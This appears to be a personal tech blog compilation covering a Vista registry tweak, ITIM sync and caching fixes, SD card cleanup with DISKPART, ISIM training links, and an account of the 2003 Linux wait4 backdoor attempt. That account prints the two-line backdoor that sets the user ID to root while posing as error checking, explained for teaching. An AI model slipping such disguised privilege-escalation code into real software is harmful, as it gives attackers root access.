Make “Command Prompt Here” Always Display for Folders in Windows Vista

Make “Command Prompt Here” Always Display for Folders in Windows Vista.

 

There’s a simple registry hack you can do that will enable “Open Command Window Here” item without holding down the shift key:

Manual Registry Hack

Open up regedit.exe through the start menu search or run box, and then browse down to the following key to add the right-click menu to Directory:

Rename the “Extended” key on the right to something else, like “Extended-Orig”. (Note that you could simply delete the value, but renaming it ensures that you can quickly rename it back to reverse the change)

HKEY_CLASSES_ROOT\Directory\shell\cmd

Advertisements

Aborting pending reports synchronization

Aborting pending reports synchronization AKA unlocking ITIM Data synchronization

Also known as How to kill a Data Sync request in ITIM


 SELECT STATUS, STATUS_DETAIL, STARTED_TIME FROM
      SYNCHRONIZATION_HISTORY WHERE REQ_TYPE ='DS'
 SELECT COUNT(STATUS)
       FROM SYNCHRONIZATION_HISTORY WHERE STATUS ='Started' AND req_type='DS'

 UPDATE SYNCHRONIZATION_HISTORY SET STATUS = 'Aborted'
       WHERE STATUS = 'Started'

This will find the stuck reconciliation records and will set the status to Aborted , so you can initiate a new reconciliation from the console.

#ibm, #isim, #itim, #reconciliation

Cleaning Partition on SD Card

You can format the tiny 64M FAT32 partition, but the remainder of the SD card remains “Unallocated” after you dump the existing (and inaccessible) Linux partition. No amount of pushing or shoving in the Disk Manager application is going to fix this problem. Instead, we’re going to turn to the simple and effective DISKPART tool.

Open up the Start Menu and type “diskpart” in the run box. Press enter. You’ll be prompted by the Windows UAC to authorize admin access to the DISKPART tool.

A command-prompt-like window will open up, only the prompt will say “DISKPART”. At that prompt, type “list disk”.

In the list output on our machine you can see the computer’s hard drive (119GB) and the removable SD card (14GB). It is absolutely critical you note the proper disk number. DISKPART commands are immediate and without any warning. If you type in the wrong disk number, you’re going to have a really bad time.

After identifying your SD card’s disk number, enter the following command “select disk #” where # is the disk number of your SD card.

Whatever commands you execute after this point will only make changes to the selected disk; now would be a good time to double check you’ve selected the right disk just to be extra safe.

Next, now enter the command “clean”

The clean command zeroes out the sectors of the disk that contain the partition data. If you wished to zero out all data on the SD card you could use “clean all” instead, but unless you have a pressing privacy/security reason for overwriting the the entire SD card with zeros, it’s unwise to waste the read/write cycles of the flash media.

After cleaning the disk, enter the following command “create partition primary”

The command, as the syntax implies, creates a new partition on the disk and sets it to primary. After creating the primary partition, the entire storage capacity of the SD card should be available to Windows. If we peek back into Disk Manager, we no longer see a tiny partition with a huge hunk of unallocated space, but a large partition ready to be formatted:

That’s all there is to it! A little DISKPART wizardy and the SD card is factory fresh again.

 

#clean, #format, #partition, #sdcard

Linux Backdoor Attempt

Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.

But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.

But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]

A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.

This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.

But the attempt didn’t work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.

Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know.

 

#backdoor, #linux, #nsa

Javapocalypse

ITIM as Non-Remoteable API

Error Connecting to Directory Server in ITIM as Non-Remoteable API is Used

Problem Description

When Connecting to ITIM through non-remoteable APIs (such as com.ibm.itim.policy.analysis.ProvisioningPolicyAnalysis) remotely a ClassCastException can be encountered.

Cause

This is due to the LDAP cache model used by ITIM which utilizes WebSphere’s Distributed Object cache. When invoked remotely, the remote application creates a new LdapCacheKey locally which is pushed to the WAS Distributed Map. Subsequent ITIM server operations retrieve this new LdapCacheKey and throw the class cast exception upon finding the retrieved key does not match the expected key local to the ITIM server.

When using non-remotable APIs remotely a ClassCastException such as the following can be encountered:
[11/14/08 16:17:23:281 CST] 0000005d SystemOut O 16:17:23,265 ERROR com.acme.integration.RestServlet:375 – com.ibm.itim.policy.analysis.PPAException: com.ibm.itim.policy.analysis.ProvisioningPolicyAnalysis.ERROR; com.ibm.itim.cache.ldap.LdapCacheValue incompatible with com.ibm.itim.cache.ICacheValue
[11/14/08 16:17:23:281 CST] 0000005d SystemOut O java.lang.ClassCastException: com.ibm.itim.cache.ldap.LdapCacheValue incompatible with com.ibm.itim.cache.ICacheValue

Invoking non-remoteable ITIM APIs, such as ProvisioningPolicyAnalysis or other Data Services APIs, outside of the ITIM classloader may result in ClassCastExceptions related to the LDAP Cache.

Resolution/Workaround

Remotable APIs are only those packages under com.ibm.itim.apps.* (such as com.ibm.itim.apps.policy.ProvisioningPolicyManabger). All other documented APIs should be considered non-remoteable and should not be invoked remotely.

  1. IBM Technote about this

#cache, #ibm, #isim, #itim, #ldap, #remoteable

ISIM Training Resources

IBM Security Identity Manager

General

  1. IBM Security Redbooks
  2. Welcome to IBM Security Systems Infomation Centers
  3. Adapters for IBM Tivoli Identity Manager 5.1
  4. Adapters for IBM Security Identity Manager v6.0
  5. IBM Tivoli Identity Manager 4.5 and 4.6 Documentation Tool (DocTool)
  6. Recommendations for Backing Up Security Identity Manager (ISIM / ITIM) Environments
  7. Steps that the IBM Tivoli Identity Manager Installation Program Takes to Configure the WebSphere Environment

Blogs/Wikis

  1.  IBM Tivoli Identity Manager Notes
  2. ITIM Blog by Stephen Swann